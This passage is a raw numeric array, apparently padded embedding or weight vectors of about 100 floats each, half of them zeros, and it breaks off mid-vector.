[[-0.0258016, -0.23147, 0.00357239, -0.160139, 0.455888, 0.00866226, -0.144409, 0.281689, -0.175024, 0.109945, -0.0379261, -0.131857, -0.295821, 0.195195, 0.139806, -0.00729179, -0.141377, 0.394225, -0.158041, 0.0501987, 0.032799, 0.105387, 0.796491, -0.261746, 1.55758, 0.152508, 0.0257965, -0.130343, -0.0793802, -0.136027, -0.0787439, -0.159753, 0.160643, 0.700724, -0.499892, -0.128783, 0.0102835, -0.126349, -0.179644, -0.19157, 0.0969934, -0.0762429, 0.255498, -0.283315, 0.171474, 0.283954, -0.188121, 0.310189, -0.819022, 0.321374, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.029235, -0.0646517, -0.0194702, -0.0273329, -0.123711, 0.0272014, -0.311271, 0.387491, -0.0266211, 0.126425, -0.0367029, 0.00890441, -0.0921069, 0.293622, -0.038465, -0.692146, 0.0425142, 0.067165, -0.0214922, 0.258906, -0.312305, -0.048394, 0.192257, -0.0966259, -1.11497, -0.0901181, -0.136752, 0.0297931, 0.108562, 0.0213959, 0.0181624, -0.0561474, -0.0127036, -0.282988, -0.0910787, -0.244484, 0.337415, -0.286699, 0.0182476, -0.0499157, 0.0558242, 0.0213203, 0.198828, -0.0339451, 0.0468098, -0.0206748, 0.0542548, 0.0341185, -0.0972458, -0.193489, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0419427, 0.0469791, -0.259205, 0.153392, -0.813004, 0.135786, 0.166414, -0.360354, 0.131455, -0.258915, -0.070879, 0.147447, -0.180234, -0.0829323, 0.0681898, 0.206445, -0.0485372, -0.0466509, -0.522135, 0.207349, -0.338416, -0.0304985, -0.165788, -0.0850524, -0.0542113, 0.146263, 0.0471087, -0.0209288, 0.0652706, 0.262386, 0.0782358, 0.103645, -0.048559, 0.082573, -0.994834, -1.01183, 
-2.54072, -0.056925, 0.0736427, -0.140502, -0.14086, 0.0676199, 0.41035, -0.161169, -1.44379, 0.0419447, 0.117976, 0.0449313, -0.122551, -0.383128, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0692117, -0.0593906, -0.0266454, -0.0380537, -0.379338, -0.0512851, -0.847465, 0.264231, 0.0152283, -0.194284, -0.00168858, -0.102485, 0.0698372, 0.107543, 0.166244, 0.104509, -0.109774, -0.0568805, -0.0219747, 0.0473369, -0.0874179, 0.0750282, 0.380817, -0.734915, -3.53736, 0.0558762, -2.01481, -0.0331157, 0.0480766, -0.233404, 0.0184385, -0.511417, -0.0248016, -2.41981, -0.313752, -0.0754298, 0.127132, 0.0944427, 0.190752, -0.0671049, 0.0565998, 0.0693641, -0.470397, -0.229441, 0.196557, 0.0775015, -0.0699385, 0.135819, -0.601233, -0.112589, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.621562, 0.371749, -2.42609, -0.122756, -6.61173, -0.692257, 0.126841, 0.641098, -0.196036, 0.0280142, -0.335779, -0.437676, 0.432885, -0.192703, 0.00438373, -2.10056, -0.120177, -0.882537, 0.129798, 0.13456, 0.274367, 0.116356, 1.03562, -0.11493, -4.60807, -2.19765, 0.0469149, -0.472028, -0.32215, -0.232857, -0.0765277, -0.122182, -0.544378, 1.09031, -0.2938, -0.810782, 1.36429, 0.336158, 0.126724, -0.225823, 0.451782, -0.172242, 0.221477, 0.353405, -1.50194, 0.00829146, -0.337572, -0.372375, 0.106392, -0.835185, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0216475, 
-0.190664, -1.14335, -0.565587, -1.21574, -0.169935, 0.694361, 0.165916, -0.176057, 0.0696841, -0.141583, -0.424621, 0.537166, -0.135531, -0.130034, 1.21759, -0.350875, 0.0592194, -0.0623637, -0.0193078, -0.420243, -0.0240125, -0.239033, -0.0541694, 0.547746, 0.033792, -0.105567, -0.476358, 0.231366, -0.205493, -0.20943, -0.145826, 0.203535, 0.995602, -0.336254, 0.00424782, 0.845397, 0.10336, 0.084489, -0.418694, 0.184852, -0.164344, -0.113265, 0.0771323, 0.0692943, -0.0244251, -0.223983, -0.295817, -0.155676, 0.450173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.166607, -0.000571974, -0.107335, -0.0051575, 0.0389275, -0.276948, -0.598633, 0.247909, -0.119776, 0.0828589, -0.234715, 0.0550278, -0.0271861, 0.174729, -0.371388, 0.566574, -0.132612, -0.285666, -0.932928, 0.342261, 0.247862, -0.221231, 0.686109, -0.38082, -1.01722, 0.0979986, -3.55436, -1.10308, -0.0263736, -0.4143, -0.0470126, 0.0785754, 0.0791313, 0.598637, -0.211821, 0.383767, -0.0971628, -0.198721, 0.129592, -0.231045, -1.83025, -0.0158202, -0.0826589, -0.2063, -0.624639, -0.22373, -0.074312, -0.154578, 0.423054, -0.358898, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.185604, -0.0783327, 0.0405173, -0.0973599, 0.15335, -0.277103, 0.0179312, 0.0124641, -0.164059, -0.163214, -0.014867, 0.0184011, 0.153689, 0.0126422, 0.0816491, 0.63205, -0.0720117, 0.111781, -0.295277, 0.106842, -0.17705, -0.0833126, 1.30942, 0.0184226, 0.658725, 0.168893, 0.0871526, -0.0588389, -0.0951096, 0.168967, -0.0231794, 0.00155184, 0.215656, -0.0973569, -0.170594, -1.25872, 0.173661, -0.192775, 0.205683, 
-0.263428, 0.00804938, -0.0975608, 0.0319358, 0.13669, 0.220038, 0.0201503, -0.0136798, 0.00632431, -0.224064, -0.173864, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0285028, -0.0802878, -0.0190977, -0.0312798, 0.151094, -0.00284337, -0.00131775, -0.0121674, -0.0440862, 0.0753536, -0.0183326, -0.0356734, 0.0511998, 0.0510165, -0.0235434, 0.0210343, -0.0132481, -0.0309287, -0.0924074, 0.0119659, 0.0134332, 0.0507727, 0.139767, -0.0135398, 0.158839, 0.0145601, 0.0385023, -0.0462161, 0.0173815, 0.165095, -0.0263825, -0.0443541, 0.00197213, 0.303073, -0.181496, -0.0418246, 0.0361284, 0.0288451, -0.110491, -0.0672174, 0.0468885, 0.001576, 0.0420172, -0.0219738, 0.0712446, 0.118983, 0.0141262, 0.216143, -0.0478446, 0.0918697, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.297269, -0.118462, 0.212879, 0.262913, 0.0218007, 0.179305, -0.00890585, 0.280292, 0.28413, 0.466798, 0.100469, -0.131352, 0.313252, -0.343855, -0.0624251, 0.071888, 0.0555632, 0.403333, -0.0159713, -0.550984, -0.543776, -0.167628, -0.0153654, -0.270992, 0.00247624, -0.379727, -0.38429, 0.205124, -0.247587, 0.42583, -0.181116, 0.360893, -0.437672, -0.310981, -0.114245, 0.137665, 0.0675083, 0.872555, -0.823732, -0.351309, -0.141001, 0.333973, -0.787735, 0.214659, -0.264039, -0.201678, 0.12598, -0.482135, -0.667721, -0.527339, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0741107, 
-0.0729539, 0.0243897, 0.0169101, 0.135327, -0.127132, 0.0467325, 0.137301, -0.0262298, 0.13519, -0.0127437, 0.0572125, 0.175855, -0.0485776, -0.00965937, 0.675085, -0.00140934, 0.0631601, -0.374849, 0.0958452, 0.108538, -0.0332379, 0.527263, -0.169485, 0.244963, -0.0144966, -0.0654757, -0.0261129, -0.0299719, 0.277353, -0.0160395, 0.0352562, 0.0992832, 0.068419, -0.064303, -0.316142, -0.0521628, -0.0699284, -0.144482, -0.0590779, 0.0403799, -0.0161048, -0.0586745, -0.0271544, 0.0432116, 0.12279, -0.0319608, 0.179969, -0.226467, -0.0282592, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.257112, -0.107049, 0.00802441, -0.0547529, 0.156347, -0.0316876, 0.385207, 0.0702118, -0.154758, 0.17746, 0.00977722, 0.0186646, 0.19456, 0.0855195, -0.106087, 0.215477, -0.0594246, 0.0508124, -0.102059, 0.00979458, 0.0898298, -0.107735, 0.2007, -0.166537, -0.114024, -0.112742, -0.0619062, 0.0457317, -0.169592, -0.0962865, -0.0726888, 0.0193528, 0.128051, 0.234162, 0.0685097, 0.0039244, 0.151275, -0.078022, 0.0316844, -0.00169063, -0.648575, -0.0837157, -0.0144884, 0.000798941, 0.0451498, -0.0660855, 0.0219376, 0.0372027, 0.0349434, 0.230996, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.71568, -0.166551, -0.212621, -0.133977, 0.277569, -2.81849, -0.798868, 0.216226, -0.264188, -0.153353, 0.0720427, 0.168803, 0.381083, 0.616379, -0.367067, 0.577458, -0.0955947, -0.219344, 0.674456, -0.30227, 0.384659, 0.282579, -0.321816, -0.140425, -0.393061, -0.300442, 0.897781, -0.150576, 0.136226, -0.0468537, -0.110654, 0.160105, -0.255399, -0.306277, -0.292535, -1.80473, 0.206619, 
0.331433, -0.126953, -0.129643, 0.187699, 0.160233, 0.137356, 0.114188, -0.135276, -0.0256543, -0.0616556, 0.123812, -0.254031, -0.196401, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.979403, -0.123645, 0.2613, -2.97615, 0.377597, -0.341901, 0.0587119, 0.577068, -0.0572139, 0.0170571, -0.0526798, -0.00772473, 0.804532, -0.583145, -0.23409, 0.876251, 0.0125127, -0.718797, 0.00777378, 0.129548, 0.789518, -0.209511, -0.964558, 0.200089, -0.875285, -0.442857, -0.0489493, 0.545753, -0.526329, 0.954469, 0.0358897, 0.0103483, 0.505258, 0.751915, 0.503983, 0.083275, 1.85284, 0.0204114, 0.721685, 0.236733, -0.134002, -0.382997, 0.648337, 0.476355, -0.205407, -0.315524, -0.201778, -0.832343, 0.228483, 0.198143, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0210991, -0.165966, -0.00547017, -0.107727, 0.295288, 0.0170348, -0.0871579, 0.150628, -0.11756, 0.0802052, -0.0292833, -0.0973296, -0.18027, 0.129785, 0.080985, -0.0983142, -0.086412, 0.210093, -0.127318, 0.0106795, 0.00659228, 0.074975, 0.432009, -0.143591, 0.974743, 0.0916842, 0.0176047, -0.0973805, -0.0363975, -0.0709328, -0.0564572, -0.0884216, 0.107842, 0.513564, -0.356642, -0.0914048, 0.00620391, -0.0723126, -0.163673, -0.126888, 0.0731371, -0.0373321, 0.162283, -0.179552, 0.115317, 0.1973, -0.0972321, 0.239698, -0.469952, 0.218666, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.36441, -0.132012, 
0.0804094, -0.0945326, -0.775636, -0.69069, -0.0477259, 0.283791, -0.460196, 0.0887096, -0.0472329, -0.0977718, -0.503173, 0.331544, 0.0803581, -0.552731, 0.0254025, 0.65388, -0.0731032, 0.257224, 0.302775, -0.0824733, -0.249731, -0.22691, -1.02132, -0.160784, 0.341393, 0.0645548, -1.17604, 0.122323, -0.113188, -0.0795917, -0.361766, 0.225467, -0.0496277, -0.0481296, -0.0305203, 0.237251, -0.290487, 0.0123094, 0.0651388, 0.180411, -0.362092, -0.189182, -0.147283, -0.0139544, -0.264639, 0.1535, -0.0693186, 0.101178, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.396435, 0.0132362, -0.167214, -0.0365077, 0.14331, -1.37637, 0.066098, 0.0676383, -0.284426, 0.107661, -0.0979637, -0.0381316, 0.261001, -0.0851133, 0.0679622, 0.339413, -0.208538, 0.00544647, -0.0132891, 0.117285, 0.115448, -0.0219588, 1.08808, -0.211522, 0.456961, 0.0213237, 0.297041, -0.286903, 0.105222, -0.263843, -0.0236176, -0.00657093, -0.0212172, -0.484568, 0.158064, -0.0145087, 0.333502, 0.189636, 0.0810343, -0.125333, -0.142442, 0.0133973, -0.227786, 0.0818951, 0.0707584, -0.0249424, -0.0507563, -0.0353614, -0.52958, 0.113912, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0435409, -0.0133825, -0.0308654, -0.0149242, 0.133138, -0.230148, 0.0243181, 0.295308, -0.0630574, 0.0524762, -0.0313252, -0.0163577, 0.109298, 0.0153623, -0.391429, 0.310014, 0.0157341, -0.259949, -0.381665, 0.138856, 0.0789848, -0.11167, 0.506663, -0.106027, 0.37007, -0.335757, -0.185752, -0.215149, -0.0703311, 0.508688, 0.00461321, -0.0528272, 0.105692, 0.0229892, -0.115154, 0.0374228, 0.301248, 0.0933898, -0.309089, 
-0.197939, -0.287879, -0.152514, 0.0315242, 0.101578, 0.117025, -0.0306791, -0.0364285, 0.104031, 0.241301, -0.0465528, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0328329, -0.0312707, -0.0065044, 0.0375223, 0.0145014, 0.0340988, -0.0291172, -0.00879694, -0.0124429, -0.0125286, -0.0060431, -0.0430946, 0.0445759, -0.0339221, -0.0373521, -0.0313966, -0.0338188, 0.00439441, -0.0259512, -0.0178291, -0.0210854, -0.0273673, -0.0332994, 0.00974389, 0.0462788, 0.024737, -0.0345382, -0.0561951, -0.0108141, -0.0274674, -0.0218718, 0.0211264, -0.0223155, -0.0522863, -0.000298687, -0.00583176, -0.0254912, -0.0388542, -0.0151135, -0.0767137, 0.0101308, -0.00506449, 0.0195652, -0.0138874, 0.0212485, -0.004192, -0.0699397, 0.00556573, 0.0390745, -0.0201153, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.882636, 0.310148, 0.0772045, -0.131999, 0.151275, 0.817937, 0.866256, 0.609467, -0.112224, 0.442711, 0.0426014, -0.244746, -0.0365439, 0.0141662, 0.535207, 0.437857, -1.44273, -1.41426, -2.72876, -0.162382, -0.782547, -0.572419, 0.0479226, -0.250449, 0.56186, 0.40004, 0.305303, -0.827933, -0.0180625, 0.280068, -0.927353, -0.257434, 0.182868, 0.566789, 0.774613, 0.34881, 1.20187, 0.886014, 0.0220059, -0.262252, -0.290478, 0.446285, -0.323595, 0.0522102, 0.265695, -0.246617, 0.34151, 0.0528599, 0.788863, -0.102466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 
[-0.109284, -0.156952, -0.00718559, -0.0512496, 0.301354, -0.086483, 0.121337, 0.092251, -0.0904305, -0.312373, -0.00102088, -0.00226096, -0.126922, 0.142481, 0.148623, -0.243375, -0.032754, 0.159503, 0.00575423, 0.119929, -0.0454488, -0.0654941, 0.429635, 0.0621951, 2.04574, -0.147236, 0.152621, 0.0505721, 0.0174439, 0.0632396, -0.0890005, 0.0364569, -0.232414, 0.0980076, -0.124537, -0.0143755, 0.321538, 0.118286, -0.0302487, -0.00540771, -0.00901383, 0.0424574, -0.0963901, -0.0935867, 0.201692, -0.0432249, -0.130975, 0.0989376, 0.244868, -0.0113106, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0683815, 0.0106784, 0.00390193, 0.144058, -4.18056, 0.148034, 0.498616, -0.300653, -0.0650458, 0.125065, 0.0186263, -0.068641, -0.710487, -0.209201, 0.0146473, 0.200357, -0.0246016, -2.67447, -0.00197067, 0.228489, 0.00862881, -0.0714957, 0.725849, -0.0368965, -0.148317, -0.0369188, -0.172599, -0.0167319, -0.00182902, 0.609747, -0.0146095, -0.000372265, 0.0263804, -0.0434928, -0.311821, -0.013342, 0.671058, 0.246208, 0.423826, -0.0913106, -0.0520307, -0.102068, -0.387919, 0.0267873, -0.185662, -0.0402956, 0.0350207, -0.190001, 0.0772644, 0.00573517, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.414388, -0.0310086, 0.316446, 0.203115, -1.81021, -0.203296, 0.391015, -0.687691, -0.233469, -0.0611803, 0.0357074, -0.691347, -2.44111, 0.0687253, 0.0310662, 0.218588, -0.160374, 0.230459, -0.707397, -0.629791, 0.000627439, 0.380225, 3.12233, 0.338458, 0.0993963, 0.661171, -1.21035, 0.0283629, -0.0534581, 1.10649, 0.0826446, -0.251701, 0.318202, 0.0586825, 0.0589816, 
0.0609962, 0.672858, -0.0459308, 0.174732, -0.112458, -0.349839, 0.137001, -0.465889, -1.82024, -0.585175, -0.155478, -0.13197, 0.197653, 0.085661, -0.16572, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.105231, -0.00974975, 0.00168184, 0.0197163, -0.403805, -0.24848, 0.407752, 0.0332032, -0.166447, 0.0850787, -0.219798, -0.425707, 0.0755693, 0.366576, -0.168146, 0.175608, -0.151553, 0.0580766, -0.20895, -0.38812, -0.0507966, -0.0159137, 0.524287, -0.0795892, 0.297106, -0.0926983, -0.0709329, -0.0728336, 0.144199, 0.226517, -0.0410385, 0.139978, -0.044314, 0.442128, 0.0258478, 0.0980453, -0.0806505, 0.14309, -0.0926758, -0.00334053, 0.209233, 0.00748794, 0.0823893, 0.171727, -0.233012, 0.0823122, 0.0856891, 0.291588, 0.0946487, -0.155753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.842409, -0.670159, 0.250403, -0.0427264, -0.174797, -2.14052, -0.589958, 1.05488, 0.594909, -0.600735, 0.291759, 0.0144254, -1.76525, -0.208486, -0.301235, -1.67846, -0.957711, 1.17038, -0.902834, -0.855703, 0.921776, -0.677409, 0.473776, -0.408638, -1.85875, 0.27174, -1.24471, 0.567056, 0.394496, -1.16769, 0.0353048, 0.249966, -0.691587, 0.229025, -0.246029, 0.143334, -2.99382, 1.09541, 0.569629, 0.056749, 0.0942325, 0.280204, -0.258972, 0.728191, 0.224988, -0.195338, -5.57188, 0.0688956, 1.07309, -1.58059, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.02706, 0.455693, 
-0.544531, -1.03293, 0.752081, -0.495077, 0.0295638, 0.210392, 0.0982198, -0.510222, -0.172507, 0.209715, -2.5597, -0.666255, -1.28383, -0.249607, -0.0075578, 0.39953, -0.37575, 0.0447787, 0.388338, -0.100521, 0.102345, 0.0029532, -0.549472, -0.752051, -0.37313, -0.559753, -0.318941, 0.410923, -0.130395, 0.084063, 0.0427115, -0.584379, -0.0703741, -0.0222336, -4.07926, 0.543313, -0.137664, -0.0977158, 0.0545818, -0.69009, -0.687778, -0.278227, 1.37338, -0.405542, -0.684779, -0.701456, 0.215251, -5.73866, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.132456, 0.00653876, -0.181868, -0.183501, -0.00734338, 0.0619047, -0.0765973, 0.00871613, -0.234703, -0.148696, -0.145103, 0.0312273, 0.156604, -0.139479, -0.223985, -1.78745, -0.00854403, 0.139837, -0.0216704, 0.209051, -0.841269, 0.219841, 0.635227, -0.333204, 